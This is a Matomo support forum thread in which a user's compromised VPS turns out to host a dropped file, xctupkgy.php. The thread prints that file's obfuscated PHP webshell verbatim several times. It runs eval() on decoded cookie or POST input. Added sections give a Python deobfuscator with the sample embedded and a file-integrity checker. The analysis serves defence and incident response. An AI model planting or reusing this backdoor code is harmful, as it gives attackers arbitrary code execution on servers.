cvbowlr (Chris), April 4, 2019, 12:08am, #1
Hello,
I could not log in to matomo (the page was simply blank) so I tried the various steps the FAQ outlined and ended up uploading and overwriting all the files (after backing up config.ini). That let me log in, but now the dashboard won’t display and it shows this error message:
Oops… there was a problem during the request. Maybe the server had a temporary issue, or maybe you requested a report with too much data. Please try again. If this error occurs repeatedly please contact your Matomo administrator for assistance.
How can I fix this? Thanks
fdellwing (Fabian Dellwing), April 4, 2019, 7:03am, #2
Do you have access to the PHP error logs? If you are on shared hosting, please consult your hosting provider.
There should be errors in this log; if you show them to us, we might be able to tell you what to do.
cvbowlr (Chris), April 4, 2019, 9:46pm, #3
Hi Fabian,
It’s on a vps. Here is what I found:
[Wed Apr 03 00:07:29 2019] [error] [client 160.153.153.31] client denied by server configuration: /home/hfrnot211/example.com/core/Plugin/Dimension/xctupkgy.php, referer: https://example.com/core/Plugin/Dimension/xctupkgy.php
[Wed Apr 03 00:07:31 2019] [error] [client 50.87.144.89] client denied by server configuration: /home/hfrnot211/example.com/core/Plugin/Dimension/xctupkgy.php, referer: https://example.com/core/Plugin/Dimension/xctupkgy.php
[Wed Apr 03 00:07:34 2019] [error] [client 198.57.247.154] client denied by server configuration: /home/hfrnot211/example.com/vendor/piwik/device-detector/Cache/PSR16Bridge.php,
[Wed Apr 03 00:07:35 2019] [error] [client 192.185.2.129] client denied by server configuration: /home/hfrnot211/example.com/vendor/piwik/device-detector/Cache/PSR16Bridge.php,
[Wed Apr 03 00:07:36 2019] [error] [client 192.185.83.95] client denied by server configuration: /home/hfrnot211/example.com/vendor/piwik/device-detector/Cache/PSR16Bridge.php,
[Wed Apr 03 00:07:43 2019] [error] [client 69.195.124.203] client denied by server configuration: /home/hfrnot211/example.com/plugins/RssWidget/Widgets/thxjxlbk.php,
[Wed Apr 03 00:07:44 2019] [error] [client 173.201.196.182] client denied by server configuration: /home/hfrnot211/example.com/plugins/RssWidget/Widgets/thxjxlbk.php,
[Wed Apr 03 00:07:48 2019] [error] [client 198.154.240.70] client denied by server configuration: /home/hfrnot211/example.com/plugins/Diagnostics/Diagnostic/TrackerCheck.php,
[Wed Apr 03 00:07:50 2019] [error] [client 54.69.144.70] client denied by server configuration: /home/hfrnot211/example.com/plugins/Diagnostics/Diagnostic/TrackerCheck.php,
[Wed Apr 03 00:07:51 2019] [error] [client 66.147.244.219] client denied by server configuration: /home/hfrnot211/example.com/plugins/Diagnostics/Diagnostic/TrackerCheck.php,
fdellwing (Fabian Dellwing), April 5, 2019, 7:03am, #4
See here: ClientDeniedByServerConfiguration - Httpd Wiki
I guess you are missing a directory block with Require all granted.
Lukas (Lukas Winkler), April 5, 2019, 8:27am, #5
To be fair, I am pretty sure the files shouldn’t be called xctupkgy.php, so I’d recommend that you check if everything is okay and the files haven’t been modified.
cvbowlr (Chris), April 5, 2019, 7:34pm, #6
I changed all folder and file permissions to 755. Still getting same issue.
cvbowlr (Chris), April 5, 2019, 7:36pm, #7
[Thu Apr 04 14:44:45 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/core/Plugin/Dimension/xctupkgy.php
[Thu Apr 04 14:44:47 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/core/Plugin/Dimension/xctupkgy.php
[Thu Apr 04 14:44:48 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/vendor/piwik/device-detector/Cache/PSR16Bridge.php
[Thu Apr 04 14:44:49 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/plugins/RssWidget/Widgets/thxjxlbk.php
[Thu Apr 04 14:44:49 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/plugins/Diagnostics/Diagnostic/TrackerCheck.php
[Thu Apr 04 14:46:06 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/core/Plugin/Dimension/xctupkgy.php
[Thu Apr 04 14:56:36 2019] [error] [client 104.196.211.107] Symbolic link not allowed or link target not accessible: /home/hfrnot211/example.com/js/p.php
[Thu Apr 04 16:14:17 2019] [error] [client 35.237.24.128] Symbolic link not allowed or link target not accessible: /home/hfrnot211/example.com/js/p.php
[Thu Apr 04 21:03:06 2019] [error] [client 35.231.244.216] Symbolic link not allowed or link target not accessible: /home/hfrnot211/example.com/js/p.php
Lukas (Lukas Winkler), April 5, 2019, 7:38pm, #8
Hi,
Can you check if the files /home/hfrnot211/example.com/js/p.php and example.com/core/Plugin/Dimension/xctupkgy.php exist and what is in them?
cvbowlr (Chris), April 5, 2019, 8:40pm, #9
Hi Lukas,
p.php is blank
xctupkgy.php contains:
<?php
$ckfca = 'pk*to_cs#b3\'m0uvy5-1xrg24iHad986nel7';$idcueee = Array();$idcueee[] = $ckfca[26].$ckfca[2];$idcueee[] = $ckfca[8];$idcueee[] = $ckfca[28].$ckfca[19].$ckfca[35].$ckfca[30].$ckfca[19].$ckfca[35].$ckfca[24].$ckfca[35].$ckfca[18].$ckfca[35].$ckfca[13].$ckfca[10].$ckfca[28].$ckfca[18].$ckfca[24].$ckfca[27].$ckfca[23].$ckfca[9].$ckfca[18].$ckfca[27].$ckfca[31].$ckfca[29].$ckfca[17].$ckfca[18].$ckfca[17].$ckfca[29].$ckfca[29].$ckfca[35].$ckfca[13].$ckfca[9].$ckfca[31].$ckfca[33].$ckfca[9].$ckfca[29].$ckfca[17].$ckfca[27];$idcueee[] = $ckfca[6].$ckfca[4].$ckfca[14].$ckfca[32].$ckfca[3];$idcueee[] = $ckfca[7].$ckfca[3].$ckfca[21].$ckfca[5].$ckfca[21].$ckfca[33].$ckfca[0].$ckfca[33].$ckfca[27].$ckfca[3];$idcueee[] = $ckfca[33].$ckfca[20].$ckfca[0].$ckfca[34].$ckfca[4].$ckfca[28].$ckfca[33];$idcueee[] = $ckfca[7].$ckfca[14].$ckfca[9].$ckfca[7].$ckfca[3].$ckfca[21];$idcueee[] = $ckfca[27].$ckfca[21].$ckfca[21].$ckfca[27].$ckfca[16].$ckfca[5].$ckfca[12].$ckfca[33].$ckfca[21].$ckfca[22].$ckfca[33];$idcueee[] = $ckfca[7].$ckfca[3].$ckfca[21].$ckfca[34].$ckfca[33].$ckfca[32];$idcueee[] = $ckfca[0].$ckfca[27].$ckfca[6].$ckfca[1];foreach ($idcueee[7]($_COOKIE, $_POST) as $fvljbb => $wbwrcw){function vpxwv($idcueee, $fvljbb, $iairx){return $idcueee[6]($idcueee[4]($fvljbb . $idcueee[2], ($iairx / $idcueee[8]($fvljbb)) + 1), 0, $iairx);}function fhnbk($idcueee, $lmrbrx){return @$idcueee[9]($idcueee[0], $lmrbrx);}function yhfcgig($idcueee, $lmrbrx){$whfieh = $idcueee[3]($lmrbrx) % 3;if (!$whfieh) {eval($lmrbrx[1]($lmrbrx[2]));exit();}}$wbwrcw = fhnbk($idcueee, $wbwrcw);yhfcgig($idcueee, $idcueee[5]($idcueee[1], $wbwrcw ^ vpxwv($idcueee, $fvljbb, $idcueee[8]($wbwrcw))));}
Lukas (Lukas Winkler), April 5, 2019, 8:48pm, #10
Hi @cvbowlr
This code looks a lot like programming code that tries to hide what it is doing.
Most commonly this is some kind of malware that tries to take over the server or do other damage.
Please immediately check everything on this server for anomalies and security issues (outdated CMS or plugins).
Also check all files on the server for their checksum and whether they look suspicious (via the Matomo integrity checker and similar tools for other web applications).
Lukas (Lukas Winkler), April 5, 2019, 9:01pm, #11
I am by far no expert in PHP malware, but formatting the code you posted a bit nicer makes it kind of readable:
<?php
$ckfca = 'pk*to_cs#b3\'m0uvy5-1xrg24iHad986nel7';
$idcueee = Array();
$idcueee[] = $ckfca[26] . $ckfca[2];
$idcueee[] = $ckfca[8];
$idcueee[] = $ckfca[28] . $ckfca[19] . $ckfca[35] . $ckfca[30] . $ckfca[19] . $ckfca[35] . $ckfca[24] . $ckfca[35] . $ckfca[18] . $ckfca[35] . $ckfca[13] . $ckfca[10] . $ckfca[28] . $ckfca[18] . $ckfca[24] . $ckfca[27] . $ckfca[23] . $ckfca[9] . $ckfca[18] . $ckfca[27] . $ckfca[31] . $ckfca[29] . $ckfca[17] . $ckfca[18] . $ckfca[17] . $ckfca[29] . $ckfca[29] . $ckfca[35] . $ckfca[13] . $ckfca[9] . $ckfca[31] . $ckfca[33] . $ckfca[9] . $ckfca[29] . $ckfca[17] . $ckfca[27];
$idcueee[] = $ckfca[6] . $ckfca[4] . $ckfca[14] . $ckfca[32] . $ckfca[3];
$idcueee[] = $ckfca[7] . $ckfca[3] . $ckfca[21] . $ckfca[5] . $ckfca[21] . $ckfca[33] . $ckfca[0] . $ckfca[33] . $ckfca[27] . $ckfca[3];
$idcueee[] = $ckfca[33] . $ckfca[20] . $ckfca[0] . $ckfca[34] . $ckfca[4] . $ckfca[28] . $ckfca[33];
$idcueee[] = $ckfca[7] . $ckfca[14] . $ckfca[9] . $ckfca[7] . $ckfca[3] . $ckfca[21];
$idcueee[] = $ckfca[27] . $ckfca[21] . $ckfca[21] . $ckfca[27] . $ckfca[16] . $ckfca[5] . $ckfca[12] . $ckfca[33] . $ckfca[21] . $ckfca[22] . $ckfca[33];
$idcueee[] = $ckfca[7] . $ckfca[3] . $ckfca[21] . $ckfca[34] . $ckfca[33] . $ckfca[32];
$idcueee[] = $ckfca[0] . $ckfca[27] . $ckfca[6] . $ckfca[1];
//$idcueee is now the following:
// [0] => H*
// [1] => #
// [2] => d1781747-703d-4a2b-a695-59970b6eb95a
// [3] => count
// [4] => str_repeat
// [5] => explode
// [6] => substr
// [7] => array_merge
// [8] => strlen
// [9] => pack
foreach ($idcueee[7]($_COOKIE, $_POST) as $fvljbb => $wbwrcw) {
    function vpxwv($idcueee, $fvljbb, $iairx) {
        return $idcueee[6]($idcueee[4]($fvljbb . $idcueee[2], ($iairx / $idcueee[8]($fvljbb)) + 1), 0, $iairx);
    }
    function fhnbk($idcueee, $lmrbrx) {
        return @$idcueee[9]($idcueee[0], $lmrbrx);
    }
    function yhfcgig($idcueee, $lmrbrx) {
        $whfieh = $idcueee[3]($lmrbrx) % 3;
        if (!$whfieh) {
            eval($lmrbrx[1]($lmrbrx[2]));
            exit();
        }
    }
    $wbwrcw = fhnbk($idcueee, $wbwrcw);
    yhfcgig($idcueee, $idcueee[5]($idcueee[1], $wbwrcw ^ vpxwv($idcueee, $fvljbb, $idcueee[8]($wbwrcw))));
}
This code allows anyone who can access this URL to execute arbitrary code on the server and basically do whatever they want.
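The decoding Lukas did by hand generalizes: the "character pool plus index chain" construction is mechanical, so a script can undo it. The following is an added example (not code from the thread, from Matomo, or from the malware author) that reads the posted xctupkgy.php, rebuilds the $idcueee table from the $ckfca pool string and rewrites the rest of the code with the recovered function names and literals in place. The regular expressions and function names are my own and assume the `$table[] = $pool[i].$pool[j]...` pattern seen in this sample; other droppers use different tricks and will need their own handling.

```python
import re

# The obfuscated xctupkgy.php posted earlier in the thread, embedded as the
# sample input (this is the thread's own malware sample, reproduced verbatim).
SAMPLE = r"""<?php
$ckfca = 'pk*to_cs#b3\'m0uvy5-1xrg24iHad986nel7';$idcueee = Array();$idcueee[] = $ckfca[26].$ckfca[2];$idcueee[] = $ckfca[8];$idcueee[] = $ckfca[28].$ckfca[19].$ckfca[35].$ckfca[30].$ckfca[19].$ckfca[35].$ckfca[24].$ckfca[35].$ckfca[18].$ckfca[35].$ckfca[13].$ckfca[10].$ckfca[28].$ckfca[18].$ckfca[24].$ckfca[27].$ckfca[23].$ckfca[9].$ckfca[18].$ckfca[27].$ckfca[31].$ckfca[29].$ckfca[17].$ckfca[18].$ckfca[17].$ckfca[29].$ckfca[29].$ckfca[35].$ckfca[13].$ckfca[9].$ckfca[31].$ckfca[33].$ckfca[9].$ckfca[29].$ckfca[17].$ckfca[27];$idcueee[] = $ckfca[6].$ckfca[4].$ckfca[14].$ckfca[32].$ckfca[3];$idcueee[] = $ckfca[7].$ckfca[3].$ckfca[21].$ckfca[5].$ckfca[21].$ckfca[33].$ckfca[0].$ckfca[33].$ckfca[27].$ckfca[3];$idcueee[] = $ckfca[33].$ckfca[20].$ckfca[0].$ckfca[34].$ckfca[4].$ckfca[28].$ckfca[33];$idcueee[] = $ckfca[7].$ckfca[14].$ckfca[9].$ckfca[7].$ckfca[3].$ckfca[21];$idcueee[] = $ckfca[27].$ckfca[21].$ckfca[21].$ckfca[27].$ckfca[16].$ckfca[5].$ckfca[12].$ckfca[33].$ckfca[21].$ckfca[22].$ckfca[33];$idcueee[] = $ckfca[7].$ckfca[3].$ckfca[21].$ckfca[34].$ckfca[33].$ckfca[32];$idcueee[] = $ckfca[0].$ckfca[27].$ckfca[6].$ckfca[1];foreach ($idcueee[7]($_COOKIE, $_POST) as $fvljbb => $wbwrcw){function vpxwv($idcueee, $fvljbb, $iairx){return $idcueee[6]($idcueee[4]($fvljbb . $idcueee[2], ($iairx / $idcueee[8]($fvljbb)) + 1), 0, $iairx);}function fhnbk($idcueee, $lmrbrx){return @$idcueee[9]($idcueee[0], $lmrbrx);}function yhfcgig($idcueee, $lmrbrx){$whfieh = $idcueee[3]($lmrbrx) % 3;if (!$whfieh) {eval($lmrbrx[1]($lmrbrx[2]));exit();}}$wbwrcw = fhnbk($idcueee, $wbwrcw);yhfcgig($idcueee, $idcueee[5]($idcueee[1], $wbwrcw ^ vpxwv($idcueee, $fvljbb, $idcueee[8]($wbwrcw))));}"""

# $pool = '...';  a single-quoted PHP string used as the character pool
POOL_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")
# $table[] = $pool[12].$pool[3]...;  one rebuilt string per statement
APPEND_RE = re.compile(r"\$(\w+)\[\]\s*=\s*((?:\$\w+\[\d+\]\s*\.?\s*)+);")
INDEX_RE = re.compile(r"\$(\w+)\[(\d+)\]")
# $table[N], optionally followed by "(" (a call through a variable function)
USE_RE = re.compile(r"\$(\w+)\[(\d+)\](\s*\()?")


def php_unescape_single(s):
    """Undo the only two escapes PHP honours inside single quotes: \\' and \\\\."""
    return re.sub(r"\\(['\\])", r"\1", s)


def recover_string_tables(src):
    """Rebuild every $table[] = $pool[i].$pool[j]... array from its pool string.

    PHP indexes strings by byte, so the pool is handled as the UTF-8 bytes PHP
    would see and each recovered piece is decoded as latin-1 (lossless).
    """
    pools = {name: php_unescape_single(body).encode("utf-8")
             for name, body in POOL_RE.findall(src)}
    tables = {}
    for table, expr in APPEND_RE.findall(src):
        piece = b"".join(bytes([pools[pool][int(i)]])
                         for pool, i in INDEX_RE.findall(expr))
        tables.setdefault(table, []).append(piece.decode("latin-1"))
    return tables


def deobfuscate(src):
    """Return the code after the table-building prologue with every $table[N]
    replaced by its recovered string: a bare function name where it is called,
    a quoted PHP literal everywhere else. Unresolved lookups are left alone."""
    tables = recover_string_tables(src)
    ends = [m.end() for m in APPEND_RE.finditer(src)]
    body = src[max(ends):] if ends else src

    def substitute(m):
        table, idx, call = m.group(1), int(m.group(2)), m.group(3)
        values = tables.get(table)
        if values is None or idx >= len(values):
            return m.group(0)
        if call:
            return values[idx] + "("
        return "'" + values[idx].replace("\\", "\\\\").replace("'", "\\'") + "'"

    return USE_RE.sub(substitute, body).strip()


if __name__ == "__main__":
    for name, values in recover_string_tables(SAMPLE).items():
        for i, value in enumerate(values):
            print(f"${name}[{i}] => {value}")
    print()
    print(deobfuscate(SAMPLE))
```

Running it prints the same ten entries Lukas listed and a body in which the control flow is plain: every cookie and POST parameter is hex-decoded with pack('H*'), XORed with a keystream made of the parameter's own name followed by the fixed UUID string, split on '#', and, when the number of parts is a multiple of three, the second part is called with the third as its argument inside eval(). The parameter name is the only secret, and any name works, which is why nothing about such a request stands out in a normal access log and why Fabian's advice to treat the whole host as compromised is the right call.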
cvbowlr (Chris), April 5, 2019, 9:14pm, #12
Thanks Lukas,
How do I check the checksums? It’s a vps hosting.
fdellwing (Fabian Dellwing), April 6, 2019, 7:34am, #13
I would disable the webserver and seek help from your hoster. Everything there could be infected. The found code looks a damn lot like things explained in this handy video: YouTube
I would throw away anything that ever lived on that VPS, most likely nothing can be trusted anymore.
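Chris's question about checksums did not get a concrete answer in the thread. The technique behind the Matomo integrity checker that Lukas mentioned is simply a comparison of the deployed tree against a pristine copy of the same release. The script below is an added example (not the thread's code and not Matomo's own checker) of that comparison: it hashes both trees and reports files that are extra, missing or changed. It assumes you can obtain the clean release archive for your exact version; the ignore list (config/config.ini.php and tmp/, which are site-specific), the symlink handling and the demo() fixture that mirrors what this thread found are my own.

```python
import hashlib
import os
import tempfile


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root, ignore=()):
    """Map every file under root (relative POSIX path) to its SHA-256.

    Symlinks are not followed: they are recorded as 'symlink:<target>' so a
    planted link (the Apache log above flagged js/p.php as one) is reported
    as an added or modified entry instead of being hashed through to whatever
    it points at, which may not even be readable.
    """
    digests = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if any(rel == p or rel.startswith(p + "/") for p in ignore):
                continue
            if os.path.islink(full):
                digests[rel] = "symlink:" + os.readlink(full)
            else:
                digests[rel] = sha256_of(full)
    return digests


def compare_trees(clean_root, deployed_root, ignore=("config/config.ini.php", "tmp")):
    """Diff a pristine release tree against the deployed one.

    Returns paths that exist only in the deployment (dropped files), only in
    the release (deleted files) and in both but with different content
    (tampered files). The ignore list covers site-specific paths; extend it
    for your install, but never with a directory that should hold only
    release code.
    """
    clean = hash_tree(clean_root, ignore)
    deployed = hash_tree(deployed_root, ignore)
    return {
        "added": sorted(p for p in deployed if p not in clean),
        "missing": sorted(p for p in clean if p not in deployed),
        "modified": sorted(p for p in clean if p in deployed and clean[p] != deployed[p]),
    }


def _write(root, rel, content):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as f:
        f.write(content)


def demo():
    """Constructed fixture (not a real Matomo tree): a three-file stand-in for
    a release, and a deployment of it with a dropped PHP file under core/, an
    empty js/p.php and one tampered file. Returns compare_trees() on the pair."""
    base = tempfile.mkdtemp(prefix="matomo-integrity-")
    clean, deployed = os.path.join(base, "clean"), os.path.join(base, "deployed")
    release = {
        "index.php": "<?php // entry point\n",
        "core/Plugin/Dimension/Dimension.php": "<?php class Dimension {}\n",
        "js/piwik.js": "var Piwik = {};\n",
    }
    for root in (clean, deployed):
        for rel, content in release.items():
            _write(root, rel, content)
    _write(deployed, "config/config.ini.php", "[database]\n")  # site-specific, ignored
    _write(deployed, "core/Plugin/Dimension/xctupkgy.php", "<?php /* obfuscated body */\n")
    _write(deployed, "js/p.php", "")
    _write(deployed, "index.php", "<?php // entry point\ninclude 'js/p.php';\n")  # tampered
    return compare_trees(clean, deployed)


if __name__ == "__main__":
    import sys
    report = compare_trees(sys.argv[1], sys.argv[2]) if len(sys.argv) == 3 else demo()
    for kind, paths in report.items():
        for p in paths:
            print(f"{kind:9s} {p}")
```

Run it as `python integrity.py /path/to/clean-release /path/to/deployed` to compare real trees, or with no arguments to see the fixture report. Two caveats apply on a host like the one in this thread: run it from a clean machine over a copy of the files (a compromised PHP or Python interpreter can lie), and treat "no differences" as a statement about this directory only, since the attacker's foothold may live in the web server configuration, cron, or another application on the same VPS.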